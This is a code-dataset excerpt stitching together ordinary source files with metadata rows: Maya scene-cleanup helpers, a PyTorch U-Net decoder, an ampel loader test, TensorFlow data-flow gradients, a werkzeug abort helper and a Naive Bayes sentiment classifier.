		# Turtle locks its nodes - unlock before delete or the delete fails.
		mc.lockNode(turtleNode,l=False)
		mc.delete(turtleNode)
	# Unload Plugin (force unload; report rather than raise on failure).
	if mc.pluginInfo('Turtle',q=True,loaded=True):
		print('Unloading Turtle plugin...')
		try: mc.unloadPlugin('Turtle',f=True)
		except Exception: print('Error unloading Turtle plugin!')
| utils/cleanup.py | 24,973 | Return a list of all existing animCurves of a specified type.
@param curveList: List of animCurve types to consider.
@type curveList: list
@param curveTypeList: List of animCurve types to consider.
@type curveTypeList: list
Assign initialShadingGroup (lambert1) to specified geometry.
@param geoList: List of geometry to apply default shader to. If empty, use all scene geometry
@type geoList: list
Check for non-zero transforms
@param objList: List of transforms to check.
@type objList: list
@param tol: Value tolerance.
@type tol: float
Return a list of nodes that contain construction history
@param objList: List of objects to check for construction history.
@type objList: list
Copy user defined attributes from an input shape to the output deforming shape.
@param geoList: List of geometry to copy atributes for.
@type geoList: list
Delete unused object sets
@param excludeList: A list of sets to exclude from the list of unused sets.
@type excludeList: list
Delete construction history for specified geometry
@param geoList: List of objects to delete for construction history from.
@type geoList: list
Delete all display layers
Delete empty groups
Delete empty groups
Delete empty groups
Delete empty object sets
@param setList: A list of sets to check. If empty, chack all sets in current scene.
@type setList: list
Delete all intermediate shapes in the scene
Delete nodes of the specified type(s).
@param nodeTypeList: List of node types to delete.
@type nodeTypeList: list
Delete all render layers
Delete all node of type "unknown" in the scene
Delete all unused reference nodes in the scene
Delete all unused shading nodes in the scene
Delete user defined attributes from the specified list of nodes
@param nodeList: List of nodes to delete user defined attrs from. If empty, assume all nodes.
@type nodeList: list
@param includeShapes: Delete user attributes
@type includeShapes: bool
Disable drawing overrides for all DAG descendents of the specified transform node.
@param state: The transform under which all descendent node drawing overrides will be disabled.
@type state: bool
Check all/specified objects for display overrides
@param objList: List of DAG nodes to check. If empty, use all DAG nodes in scene
@type objList: list
List empty groups.
@param objList: List of transforms to check.
@type objList: list
Return a list if empty layers
@param layerList: List of layers to check. If empty, use all existing layers in current scene.
@type layerList: list
Return a list of empty sets
@param setList: List of sets to check.
@type setList: list
Return a list of intermediate shapes.
@param objList: List of objects to check for intermediate shapes.
@type objList: list
Return a list of transforms with multiple shape nodes
@param objList: List of objects to check for multiple shapes.
@type objList: list
Return a list of non intermediate geometry shapes with no shader assignment.
@param geoList: List of geometry to check for shader assignments.
@type geoList: list
Delete nodes and unload plgin related to the Turtle Renderer.
Return a list of incorrectly named geometry shape nodes.
@param objList: List of objects to check for valid shape names. If empty, get all nodes of the specified type.
@type objList: list
@param typeList: List of shape types to check for valid names.
@type typeList: list
@param skipIntermediates: Skip intermediate shapes.
@type skipIntermediates: bool
@param skipMultipleShapes: Skip objects with multiple shape nodes.
@type skipMultipleShapes: bool
@param strict: Shape name must match parent+"Shape" to pass.
@type strict: bool
Fix incorrectly named geometry shape node
@param objList: List of objects to check for valid shape names.
@type objList: list
@param typeList: List of shape types to check for valid names.
@type typeList: list
@param skipIntermediates: Skip intermediate shapes
@type skipIntermediates: bool
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
Return a list of nodes with non unique names
@param objList: List of scene objects to check. If empty, use all existing scene nodes.
@type objList: list
@param transformsOnly: Check transform names only
@type transformsOnly: bool
Return a list of unknown nodes.
Return a list of unused reference nodes.
Return a list of unused shading nodes.
Return a list of user defined attributes for a specified list of nodes (and shapes).
@param objList: List of objects to check for user defined attributes.
@type objList: list
@param includeShapes: Also check shapes for user defined attributes.
@type includeShapes: bool
Check for valid names in the specified list of nodes
@param objList: List of objects to check valid names for. If empty use all scene transforms
@type objList: list
Reset transform values
@param objList: List of transforms to zero out.
@type objList: list
=========== - Cleanup - =========== Get List of Con Joints Toggle State Bone None Set Joint Radius Hide Rotate Order Return Result Get list of End joints Toggle state Bone None Set Joint Radius Hide Rotate Order Return Result ========== - Checks - ========== Get Descendent Node List ============================= - Disable Drawing Overrides - ============================= Check Override Attribute Check Override Attribute Connections Disable Drawing Overrides ================= - Return Result - ================= ========== - Checks - ========== Get list of scene nodes Determine non unique names Return result Check geo list Remove Default Nodes Check valid names Check prefixif not obj.startswith('cn_') and not obj.startswith('lf_') and not obj.startswith('rt_'): result.append(obj) Check "pasted" Check "poly" Check double underscore "__" Check names ending with a digit (0-9) Remove Duplicate Entries Return result ========== - Checks - ========== ==================== - Build Shape List - ==================== Get Shapes from Transform Check Multiple Shapes Get Shapes ===================== - Check Shape Names - ===================== Check Type Check Intermediate Object Get transform parent name Get Short Names Check Shape Name ================= - Return Result - ================= Check nodeList For each node Get All Shapes Check Intermediate Shapes Return Result Get scene transforms Iterate over scene transforms Check Transform Get transform shape list Check shape list Check number of shapes Return result Get Scene Geometry For each node Check Construction History Remove Self Ignore Node Types Check History Remove Duplicate Names Return Result Initialize Return List Check objList For each node Check Shapes Return Result Check objList Find Empty Groups Return Result Check setList Check empty sets Check Set Skip Default Sets Check Set Return result Check Layer List Check Empty Layers Check Layer Skip Default Layers Check Membership Return Result Initialize Return List List 
AnimCurve Nodes Return Result Check Geometry List Check Shader Assignment Return Result Initialize Return List Get list of existing references Check Unused Reference Return Result Check Object List Check Transforms Skip Default Transforms Translate Rotate Scale Return Result Check Object List Check Display Overrides Return Result ========= - Fixes - ========= Get Shape Transform Parent Check Shape Name Rename Shape Return Result Get list of intermediate shapes Delete intermediate shapes Return result Get Scene Geometry Delete History Return Result Check nodeList For each node Delete user attributes Include Shapes Delete shape user attributes Get Empty Group List Delete Empty Groups Return Result Get Empty Group List Delete Empty Groups Return Result Get Empty Group List Delete Empty Groups Return Result Get list of unknown nodes Delete unknown nodes Return Result Check Node Types Get Node List (by type) Delete Nodes Return Result Check setList Check empty sets Delete empty sets Return result Get set list Delete unused sets Return resulttexList = mc.ls(tex=True)if texList: mc.delete(texList) Get display layer list Delete display layers Return result Get render layer list Delete render layers Return result Check geoList Assign Initial Shading Group Return result Check Object List Check Transforms Translate Rotate Scale Return Result Check Geometry List Copy Input Shape Attrs Get Output Shape Get Input Shape Copy User Attributes ======== - MISC - ======== Remove Turtle Nodes Unload Plugin | 8,542 | en | 0.591728 |
import torch
import torch.nn as nn
import torch.nn.functional as F
from segmentation_models_pytorch.base import modules as md
class DecoderBlock(nn.Module):
    """One U-Net decoder stage: 2x nearest upsample, optional skip concat,
    then two 3x3 Conv2dReLU blocks.

    ``md.Attention`` modules are applied after the skip concatenation and
    after the second convolution; with ``attention_type=None`` they act as
    identity (per segmentation_models_pytorch convention).
    """

    def __init__(
        self,
        in_channels,
        skip_channels,
        out_channels,
        use_batchnorm=True,
        attention_type=None,
    ):
        super().__init__()
        # conv1 consumes the upsampled features concatenated with the skip,
        # hence in_channels + skip_channels input channels.
        self.conv1 = md.Conv2dReLU(
            in_channels + skip_channels,
            out_channels,
            kernel_size=3,
            padding=1,
            use_batchnorm=use_batchnorm,
        )
        self.attention1 = md.Attention(attention_type, in_channels=in_channels + skip_channels)
        self.conv2 = md.Conv2dReLU(
            out_channels,
            out_channels,
            kernel_size=3,
            padding=1,
            use_batchnorm=use_batchnorm,
        )
        self.attention2 = md.Attention(attention_type, in_channels=out_channels)

    def forward(self, x, skip=None):
        # Double the spatial resolution with nearest-neighbour interpolation.
        x = F.interpolate(x, scale_factor=2, mode="nearest")
        if skip is not None:
            # NOTE(review): extra upsample when the skip is still smaller than
            # x — presumably compensates for encoders with non-standard
            # strides; confirm against the encoders this decoder is used with.
            if skip.shape[-1] != x.shape[-1]:
                skip = F.interpolate(skip, scale_factor=2, mode="nearest")
            x = torch.cat([x, skip], dim=1)
            x = self.attention1(x)
        x = self.conv1(x)
        x = self.conv2(x)
        x = self.attention2(x)
        return x
class CenterBlock(nn.Sequential):
    """Optional bottleneck applied to the deepest encoder feature map.

    Two 3x3 Conv2dReLU blocks; padding=1 preserves spatial resolution.
    """

    def __init__(self, in_channels, out_channels, use_batchnorm=True):
        conv1 = md.Conv2dReLU(
            in_channels,
            out_channels,
            kernel_size=3,
            padding=1,
            use_batchnorm=use_batchnorm,
        )
        conv2 = md.Conv2dReLU(
            out_channels,
            out_channels,
            kernel_size=3,
            padding=1,
            use_batchnorm=use_batchnorm,
        )
        # nn.Sequential runs conv1 then conv2 in order.
        super().__init__(conv1, conv2)
class UnetDecoder(nn.Module):
    """U-Net decoder: a stack of upsampling ``DecoderBlock`` stages fed by
    encoder feature maps (deepest first), with an optional center block."""

    def __init__(
        self,
        encoder_channels,
        decoder_channels,
        n_blocks=5,
        use_batchnorm=True,
        attention_type=None,
        center=False,
    ):
        super().__init__()

        if n_blocks != len(decoder_channels):
            raise ValueError(
                "Model depth is {}, but you provide `decoder_channels` for {} blocks.".format(
                    n_blocks, len(decoder_channels)
                )
            )

        # Drop the first (same-resolution) skip, then reverse so the deepest
        # encoder stage comes first.
        channels = list(encoder_channels[1:])[::-1]

        # Each block consumes the previous block's output plus one skip;
        # the last block has no skip (skip channel count 0).
        head_channels = channels[0]
        input_channels = [head_channels, *decoder_channels[:-1]]
        skip_channel_list = [*channels[1:], 0]

        # Optional extra conv stack applied to the encoder head.
        self.center = (
            CenterBlock(head_channels, head_channels, use_batchnorm=use_batchnorm)
            if center
            else nn.Identity()
        )

        block_kwargs = dict(use_batchnorm=use_batchnorm, attention_type=attention_type)
        self.blocks = nn.ModuleList(
            DecoderBlock(in_ch, skip_ch, out_ch, **block_kwargs)
            for in_ch, skip_ch, out_ch in zip(
                input_channels, skip_channel_list, decoder_channels
            )
        )

    def forward(self, *features):
        # Mirror the channel bookkeeping from __init__: drop the first skip
        # and order the features deepest-first.
        feats = features[1:][::-1]
        x = self.center(feats[0])
        skips = feats[1:]
        for idx, block in enumerate(self.blocks):
            x = block(x, skips[idx] if idx < len(skips) else None)
        return x
| segmentation_models_pytorch/decoders/unet/decoder.py | 3,818 | remove first skip with same spatial resolution reverse channels to start from head of encoder computing blocks input and output channels combine decoder keyword arguments remove first skip with same spatial resolution reverse channels to start from head of encoder | 264 | en | 0.78037 |
from ampel.t3.supply.load.T3SimpleDataLoader import T3SimpleDataLoader
from ampel.core.AmpelContext import AmpelContext
def test_instantiate(core_config, patch_mongo, ampel_logger):
    """
    AbsT3Loader understands all the aliases in the ampel-core config
    """
    ctx = AmpelContext.load(core_config)
    # All configured t3 aliases, keyed by their alias name.
    aliases = ctx.config.get("alias.t3", dict)
    # Feed every alias to the loader (k[1:] strips the leading marker
    # character from each alias key — presumably a "%"-style prefix; see the
    # ampel-core alias convention) and expect one directive per alias.
    assert len(
        directives := T3SimpleDataLoader(
            context=ctx,
            logger=ampel_logger,
            directives=[k[1:] for k in aliases.keys()]
        ).directives
    ) == len(aliases)
    # Each resolved directive must round-trip back to its aliased config value.
    for d, value in zip(directives, aliases.values()):
        assert d.dict(exclude_defaults=True) == value
| ampel/test/test_T3SimpleDataLoader.py | 680 | AbsT3Loader understands all the aliases in the ampel-core config | 64 | en | 0.492394 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# NOTE: this file contained unresolved git merge-conflict markers
# (<<<<<<< / ======= / >>>>>>>), which made it a syntax error. The conflict is
# resolved in favor of the HEAD side: the other side dated from the 2015
# initial commit and used APIs removed long ago (`types` module,
# `ops.NoGradient`, integer `/` on a length).
"""Gradients for operators defined in data_flow_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from six.moves import xrange  # pylint: disable=redefined-builtin

from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops


@ops.RegisterGradient("DynamicPartition")
def _DynamicPartitionGrads(op, *grads):
  """Gradients for DynamicPartition."""
  data = op.inputs[0]
  indices = op.inputs[1]
  num_partitions = op.get_attr("num_partitions")

  # Partition the flat positions of `data` exactly as the forward op
  # partitioned the values, then stitch the incoming gradients back into
  # the original layout.
  prefix_shape = array_ops.shape(indices)
  original_indices = array_ops.reshape(
      math_ops.range(math_ops.reduce_prod(prefix_shape)), prefix_shape)
  partitioned_indices = data_flow_ops.dynamic_partition(
      original_indices, indices, num_partitions)
  reconstructed = data_flow_ops.parallel_dynamic_stitch(partitioned_indices,
                                                        grads)
  reconstructed = array_ops.reshape(reconstructed, array_ops.shape(data))
  # No gradient flows to the integer partition indices.
  return [reconstructed, None]


@ops.RegisterGradient("DynamicStitch")
@ops.RegisterGradient("ParallelDynamicStitch")
def _DynamicStitchGrads(op, grad):
  """Gradients for DynamicStitch and ParallelDynamicStitch."""

  # Inputs are (indices_0..n-1, values_0..n-1); only values get gradients.
  num_values = len(op.inputs) // 2
  indices_grad = [None] * num_values

  def AsInt32(x):
    return (x if op.inputs[0].dtype == dtypes.int32 else
            math_ops.cast(x, dtypes.int32))
  inputs = [AsInt32(op.inputs[i]) for i in xrange(num_values)]
  if isinstance(grad, ops.IndexedSlices):
    # Densify sparse gradients before gathering per-input slices.
    output_shape = array_ops.shape(op.outputs[0])
    output_rows = output_shape[0]
    grad = math_ops.unsorted_segment_sum(grad.values, grad.indices, output_rows)
  values_grad = [array_ops.gather(grad, inp) for inp in inputs]
  return indices_grad + values_grad


ops.NotDifferentiable("Queue")
ops.NotDifferentiable("QueueEnqueue")
ops.NotDifferentiable("QueueEnqueueMany")
ops.NotDifferentiable("QueueDequeue")
ops.NotDifferentiable("QueueDequeueMany")
ops.NotDifferentiable("QueueDequeueUpTo")
ops.NotDifferentiable("QueueClose")
ops.NotDifferentiable("QueueSize")

ops.NotDifferentiable("Stack")
ops.NotDifferentiable("StackPush")
ops.NotDifferentiable("StackPop")
ops.NotDifferentiable("StackClose")

ops.NotDifferentiable("GetSessionHandle")
ops.NotDifferentiable("GetSessionHandleV2")
ops.NotDifferentiable("GetSessionTensor")
ops.NotDifferentiable("DeleteSessionTensor")
| tensorflow/python/ops/data_flow_grad.py | 4,391 | Copyright 2015 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== pylint: disable=redefined-builtin | 694 | en | 0.822668 |
# -*- coding: utf-8 -*-
from werkzeug.exceptions import abort as _abort, HTTPException
def abort(http_status_code, **kwargs):
    """Raise the ``HTTPException`` matching *http_status_code*.

    Any extra keyword arguments are attached to the exception as ``e.data``
    so downstream error handlers can serialize them into the response body.
    """
    try:
        _abort(http_status_code)
    except HTTPException as e:
        # Attach a payload only when extra fields were supplied
        # (truthiness check instead of the redundant len(kwargs)).
        if kwargs:
            e.data = kwargs
        raise
| axe/utils.py | 267 | -*- coding: utf-8 -*- | 21 | en | 0.767281 |
import re
import numpy
import math
import sys
# Stop words ignored when tokenizing reviews; a frozenset gives O(1)
# membership tests instead of scanning a 100+ element list per word.
_STOP_WORDS = frozenset([
    "in", "i", "me", "my", "myself", "we", "our", "ours", "ourselves", "you",
    "your", "yours", "yourself", "yourselves", "he", "him", "his", "himself", "she",
    "her", "hers", "herself", "it", "its", "itself", "they", "them", "their",
    "theirs", "themselves", "what", "which", "who", "whom", "this", "that", "these",
    "those", "am", "is", "are", "was", "were", "be", "been", "being", "have", "has",
    "had", "having", "do", "does", "did", "doing", "a", "an", "the", "and", "but",
    "if", "or", "because", "as", "until", "while", "of", "at", "by", "for", "with",
    "about", "against", "between", "into", "through", "during", "before", "after",
    "above", "below", "to", "from", "up", "down", "out", "on", "off", "over",
    "under", "again", "further", "then", "once", "here", "there", "when", "where", "why",
    "how", "all", "any", "both", "each", "few", "more", "most", "other", "some", "such",
    "no", "nor", "not", "only", "own", "same", "so", "than", "too", "very", "s", "t",
    "can", "will", "just", "don", "should", "now"])

def extractCleanWords(review):
    '''Tokenize *review* into lowercase words with stop words removed.

    Fixes: the original filtered stop words case-sensitively (before
    lowercasing), so capitalized stop words such as "The" slipped through.
    '''
    # Replace every non-word character with a space, then split on whitespace.
    words = re.sub(r"[^\w]", " ", review).split()
    return [w.lower() for w in words if w.lower() not in _STOP_WORDS]
# Used by the bag-of-words builders to derive the vocabulary.
def createVocabTokens(reviews):
    '''Return the sorted vocabulary of unique clean words across *reviews*.'''
    vocabulary = set()
    for text in reviews:
        vocabulary.update(extractCleanWords(text))
    return sorted(vocabulary)
"""the bag of words for multinomialNB does not need to create
matrixes for each review because it takes too much space and slows
it down and it is not neccesary. The bag of words returns a
dictionary with the frequencies for each word used for the numerator of
P(xi|ci), the total words in the classifier used for the denom of
P(xi|ci), and the number of reviews for the class used to calculate
the prior probabilities for each class"""
def bagOfWords_MultinomialNB(txtFile):
    """Build multinomial bag-of-words statistics for one class of reviews.

    @param txtFile: path to a file of reviews separated by "<br /><br />".
    @return: (vocabDict, total_words, numReviews) where vocabDict maps each
        vocabulary word to its total count over all reviews (numerator of
        P(word|class)), total_words is the class's total clean-word count
        (denominator of P(word|class)), and numReviews feeds the class prior.
    """
    total_words = 0
    reviewFile = txtFile
    with open(reviewFile, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n','')
    # Reviews are delimited by literal HTML double line breaks.
    reviewList = txt.split("<br /><br />")
    # NOTE(review): this loop rebinds the loop variable only - it does NOT
    # strip punctuation from reviewList (extractCleanWords handles that).
    for review in reviewList:
        review = re.sub("[^\w\s]", "", review)
    vocabTokens = createVocabTokens(reviewList)
    numReviews = len(reviewList)
    vocabDict = dict.fromkeys(vocabTokens, 0)
    # Count per-word frequencies and the class's total clean-word count.
    for i in range(len(reviewList)):
        words = extractCleanWords(reviewList[i])
        for word in words:
            vocabDict[word] += 1
            total_words +=1
    return vocabDict, total_words, numReviews
def bagOfWords_GaussianNB(txtFile):
    """Build Gaussian-NB bag-of-words features for one class of reviews.

    @param txtFile: path to a file of reviews separated by "<br /><br />".
    @return: (sparseMatrix, vocabDict, numReviews) where sparseMatrix is a
        list of per-review {word: count} dicts, vocabDict maps each word to
        its total count over all reviews, and numReviews is the review count.
    """
    total_words = 0
    reviewFile = txtFile
    with open(reviewFile, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n','')
    reviewList = txt.split("<br /><br />")
    numReviews = len(reviewList)
    # NOTE(review): rebinds the loop variable only - reviewList is unchanged.
    for review in reviewList:
        review = re.sub("[^\w\s]", "", review)
    vocabTokens = createVocabTokens(reviewList)
    # Total count of each word across the whole class.
    vocabDict = dict.fromkeys(vocabTokens, 0)
    for i in range(len(reviewList)):
        words = extractCleanWords(reviewList[i])
        for word in words:
            vocabDict[word] += 1
    # Per-review sparse count vectors ({word: count} instead of dense rows,
    # to keep memory bounded).
    sparseMatrix = []
    for i in range(len(reviewList)):
        words = extractCleanWords(reviewList[i])
        bagList = {}
        for word in words:
            if word in bagList:
                bagList[word] +=1
            else:
                bagList[word] = 1
        sparseMatrix.append(bagList)
    return sparseMatrix, vocabDict, numReviews
#calculates the mean and varience using bag of words
def calcMean_Var(txtFile, tfidforBOW):
    '''Compute per-word [mean, variance] statistics over the reviews in *txtFile*.

    @param txtFile: path to the review file for one class.
    @param tfidforBOW: 1 to use bag-of-words counts as features,
        any other value to use tf-idf weights.
    @return: dict mapping each vocabulary word to [mean, variance].

    Fixes: the original mutated and stored a single two-element list for
    every word, so every entry of the returned dict aliased the same
    [mean, var] pair and ended up holding only the last word's statistics.
    '''
    if tfidforBOW == 1:  # bag-of-words features
        sparseMatrix, vocabDict, numReviews = bagOfWords_GaussianNB(txtFile)
    else:  # tf-idf features
        sparseMatrix, vocabDict, numReviews = tf_idf(txtFile)
    meanVarDict = {}
    for word in vocabDict:
        # Mean feature value across all reviews (a missing word counts as 0).
        mean = vocabDict[word] / numReviews
        var = 0
        for m in sparseMatrix:
            if word in m:
                var += ((m[word] - mean)**2)
            else:
                var += ((-1 * mean)**2)
        # Sample variance (n-1 denominator); a FRESH list per word fixes the
        # aliasing bug described in the docstring.
        meanVarDict[word] = [mean, var / (numReviews - 1)]
    return meanVarDict
def gaussian_BOW(trainDataPos, trainDataNeg, testData, c):
    """Classify *testData* reviews with Gaussian NB over bag-of-words counts.

    @param trainDataPos: path to the positive-class training reviews.
    @param trainDataNeg: path to the negative-class training reviews.
    @param testData: path to the test reviews.
    @param c: true label of the test file (1 = positive, 0 = negative).
    @return: accuracy, i.e. fraction of test reviews predicted as class *c*.
    """
    testFile = testData
    with open(testFile, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n','')
    reviewList = txt.split("<br /><br />")
    # NOTE(review): rebinds the loop variable only - reviewList is unchanged.
    for review in reviewList:
        review = re.sub("[^\w\s]", "", review)
    #prediction will be used for the accuracy of the classifier
    prediction = []
    # Per-word [mean, variance] from each class's training data (BOW mode).
    meanVarDictPOS = calcMean_Var(trainDataPos,1)
    meanVarDictNEG = calcMean_Var(trainDataNeg,1)
    # Word frequencies over the whole test file, restricted to words known
    # to at least one class (others carry no information here).
    testWordFreq = {}
    for review in reviewList:
        wordsInReview = extractCleanWords(review)
        for word in wordsInReview:
            if (word in meanVarDictPOS) or (word in meanVarDictNEG):
                if word in testWordFreq:
                    testWordFreq[word] += 1
                else:
                    testWordFreq[word] = 1
    for review in reviewList:
        wordsInReview = list(set(extractCleanWords(review)))
        probPos =0
        probNeg =0
        for word in wordsInReview:
            # NOTE(review): the Gaussian log-density exponent below divides by
            # var**2 with no factor of 2, unlike gaussian_tf_idf which uses
            # 2*var**2 - the two disagree; confirm the intended formula.
            if word in meanVarDictPOS:
                probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testWordFreq[word] - meanVarDictPOS[word][0])**2)/((meanVarDictPOS[word][1]**2))))
            if word in meanVarDictNEG:
                probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testWordFreq[word] - meanVarDictNEG[word][0])**2)/((meanVarDictNEG[word][1]**2))))
        # Higher log-likelihood wins; 1 = positive, 0 = negative.
        if probPos > probNeg:
            prediction.append(1)
        else:
            prediction.append(0)
    poss = 0
    for p in prediction:
        if p == c:
            poss +=1
    return(poss/len(prediction))
def tf_idf(txtFile):
    '''Compute tf-idf weighted bag-of-words for every review in *txtFile*.

    @param txtFile: path to a file of reviews separated by "<br /><br />".
    @return: (sparseMatrixTFIDF, vocabDict, numReviews) where
        sparseMatrixTFIDF is a list of {word: tf-idf} dicts (one per review),
        vocabDict maps each word to the sum of its tf-idf weights over all
        reviews, and numReviews is the number of reviews in the file.

    Fixes: the original never reset its word counter between reviews, so
    each review's term frequencies were divided by the cumulative word count
    of ALL reviews processed so far instead of that review's own length.
    '''
    with open(txtFile, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n','')
    reviewList = txt.split("<br /><br />")
    numReviews = len(reviewList)
    vocabTokens = createVocabTokens(reviewList)
    # Document frequency: number of reviews containing each word.
    vocabDictIDF = dict.fromkeys(vocabTokens, 0)
    sparseMatrixTFIDF = []
    for review in reviewList:
        words = extractCleanWords(review)
        # Per-review word count - reset for every review (this was the bug).
        reviewWordCount = len(words)
        bagListTF = {}
        for word in words:
            bagListTF[word] = bagListTF.get(word, 0) + 1
        # Normalize counts to term frequencies and bump document frequency.
        for word in bagListTF:
            bagListTF[word] = bagListTF[word] / reviewWordCount
            vocabDictIDF[word] += 1
        sparseMatrixTFIDF.append(bagListTF)
    # Combine tf with idf in place; also accumulate per-word totals used by
    # the Gaussian mean/variance statistics.
    vocabDict = dict.fromkeys(vocabTokens, 0)
    for dictTF in sparseMatrixTFIDF:
        for word in dictTF:
            dictTF[word] = dictTF[word] * math.log(numReviews / vocabDictIDF[word])
            vocabDict[word] += dictTF[word]
    return sparseMatrixTFIDF, vocabDict, numReviews
def gaussian_tf_idf(trainDataPos, trainDataNeg, testData, c):
    """Classify *testData* reviews with Gaussian NB over tf-idf features.

    @param trainDataPos: path to the positive-class training reviews.
    @param trainDataNeg: path to the negative-class training reviews.
    @param testData: path to the test reviews.
    @param c: true label of the test file (1 = positive, 0 = negative).
    @return: accuracy, i.e. fraction of test reviews predicted as class *c*.
    """
    testFile = testData
    with open(testFile, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n','')
    reviewList = txt.split("<br /><br />")
    # NOTE(review): rebinds the loop variable only - reviewList is unchanged.
    for review in reviewList:
        review = re.sub("[^\w\s]", "", review)
    #prediction will be used for the accuracy of the classifier
    prediction = []
    # Per-word [mean, variance] from each class's training data (tf-idf mode).
    meanVarDictPOS = calcMean_Var(trainDataPos,0)
    meanVarDictNEG = calcMean_Var(trainDataNeg,0)
    # Summed tf-idf weight per word over the whole test file.
    testSparseTFIDF, testVocabDict, testNumReviews = tf_idf(testData)
    for review in reviewList:
        wordsInReview = list(set(extractCleanWords(review)))
        probPos =0
        probNeg =0
        for word in wordsInReview:
            # Gaussian log-density of the test word weight under each class.
            if word in meanVarDictPOS:
                probPos += (math.log((1/(math.sqrt(2*math.pi*meanVarDictPOS[word][1])))) - (((testVocabDict[word] - meanVarDictPOS[word][0])**2)/(2*(meanVarDictPOS[word][1]**2))))
            if word in meanVarDictNEG:
                probNeg += (math.log((1/(math.sqrt(2*math.pi*meanVarDictNEG[word][1])))) - (((testVocabDict[word] - meanVarDictNEG[word][0])**2)/(2*(meanVarDictNEG[word][1]**2))))
        # Higher log-likelihood wins; 1 = positive, 0 = negative.
        if probPos > probNeg:
            prediction.append(1)
        else:
            prediction.append(0)
    poss = 0
    for p in prediction:
        if p == c:
            poss +=1
    return(poss/len(prediction))
def multinomialNB(trainDataPos, trainDataNeg, testData, c):
    """Classify *testData* reviews with a multinomial Naive Bayes model.

    @param trainDataPos: path to the positive-class training reviews.
    @param trainDataNeg: path to the negative-class training reviews.
    @param testData: path to the test reviews.
    @param c: true label of the test file (1 = positive, 0 = negative).
    @return: accuracy, i.e. fraction of test reviews predicted as class *c*.
    """
    testFile = testData
    with open(testFile, 'r', encoding='utf8') as file:
        txt = file.read().replace('\n','')
    reviewList = txt.split("<br /><br />")
    # NOTE(review): rebinds the loop variable only - reviewList is unchanged.
    for review in reviewList:
        review = re.sub("[^\w\s]", "", review)
    #prediction will be used for the accuracy of the classifier
    prediction = []
    #getting the dict, word count and review count for pos and neg from BOW
    posDict, posWordCount, posdocs = bagOfWords_MultinomialNB(trainDataPos)
    negDict, negWordCount, negdocs = bagOfWords_MultinomialNB(trainDataNeg)
    """TEST PRINT STATEMENTS
    print("Pos dic: ", len(posDict))
    print("Neg dic: ", len(negDict))
    print("Pos word count: ", posWordCount)
    print("Neg word count: ", negWordCount)
    print("Pos docs: ", posdocs)
    print("Neg docs: ", negdocs)"""
    #alpha is the smoothing paramater, through trial i found that a value
    #of 18 will have the highest prediction frequency
    alpha = 18
    #calculating the prior log prob for pos and neg
    priorLogPosProb =math.log( posdocs / (negdocs + posdocs))
    priorLogNegProb =math.log( negdocs / (negdocs + posdocs))
    """for each review in our test, we extract the words and calculate
    the log prob for that word given pos and neg and add this with
    the prior log probability, then we compare the pos and neg total
    probabilities and assign a 1 if the pos > neg, and 0 for the opposite
    We check the prediction list and calculate the accurace for the
    given classifier"""
    for review in reviewList:
        # Unique words only: each distinct word contributes once per review.
        wordsInReview = list(set(extractCleanWords(review)))
        logProbPos = 0
        logProbNeg = 0
        posPercent = 0
        negPercent = 0
        for word in wordsInReview:
            # Laplace/Lidstone smoothing: unseen words get the alpha numerator.
            if word not in posDict:
                logProbPos += math.log( ((alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
            if word in posDict:
                logProbPos += math.log( ((posDict[word] + alpha) / (posWordCount+(alpha*len(posDict) ) ) ) )
            if word not in negDict:
                logProbNeg += math.log( ((alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
            if word in negDict:
                logProbNeg += math.log( ((negDict[word] + alpha) / (negWordCount+(alpha*len(negDict) ) ) ) )
        # Posterior (up to a shared constant) = prior + likelihood, in logs.
        posPercent = priorLogPosProb + logProbPos
        negPercent = priorLogNegProb + logProbNeg
        if posPercent > negPercent:
            prediction.append(1)
        else:
            prediction.append(0)
    poss = 0
    for p in prediction:
        if p == c:
            poss +=1
    return(poss/len(prediction))
# Command-line arguments: positive/negative training and test review files.
train_pos = sys.argv[1]
train_neg = sys.argv[2]
test_pos = sys.argv[3]
test_neg = sys.argv[4]
# Multinomial NB: accuracy on the positive and negative test sets,
# averaged into a single figure.
posAcc = multinomialNB(train_pos, train_neg, test_pos,1)
negAcc = multinomialNB(train_pos, train_neg, test_neg,0)
multinomialAcc = (posAcc+negAcc) / 2
print("MultinomialNB with bag of words accuracy: ", multinomialAcc)
# Gaussian NB over bag-of-words features.
gposAcc = gaussian_BOW(train_pos, train_neg, test_pos,1)
gnegAcc = gaussian_BOW(train_pos, train_neg, test_neg,0)
gaussAcc = (gposAcc+gnegAcc) / 2
print("Gaussian with bag of words accuracy: ", gaussAcc)
# Gaussian NB over tf-idf features.
tposAcc = gaussian_tf_idf(train_pos, train_neg, test_pos,1)
tnegAcc = gaussian_tf_idf(train_pos, train_neg, test_neg,0)
tgaussAcc = (tposAcc+tnegAcc) / 2
print("Gaussian with tf_idf acc: ", tgaussAcc)
